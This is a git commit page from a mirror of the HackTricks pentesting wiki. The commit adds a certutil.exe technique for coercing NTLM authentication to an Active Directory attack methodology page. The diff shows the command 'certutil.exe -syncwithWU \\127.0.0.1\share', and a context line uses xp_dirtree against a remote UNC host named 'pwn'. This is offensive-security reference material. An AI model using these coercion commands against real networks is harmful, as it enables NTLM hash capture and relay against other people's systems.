Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-15 09:27:32 +00:00
Code Issues Projects Releases Packages Wiki Activity

Merge pull request #719 from nuts7/certutil-ntlmcoerce-newtech

Browse source 
Add NTLM auth coerce technique (certutil.exe)
This commit is contained in:
Carlos Polop 2023-10-12 00:46:14 +02:00 committed by GitHub
commit 6b6da2aa1d
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23
1 changed files with 8 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

8
windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md
View file

@ -93,6 +93,14 @@ EXEC xp_dirtree '\\10.10.17.231\pwn', 1, 1
Or use this other technique: [https://github.com/p0dalirius/MSSQL-Analysis-Coerce](https://github.com/p0dalirius/MSSQL-Analysis-Coerce)
### Certutil
It's possible to use certutil.exe lolbin (Microsoft-signed binary) to coerce NTLM authentication:
```bash
certutil.exe -syncwithWU \\127.0.0.1\share
```
## HTML injection
### Via email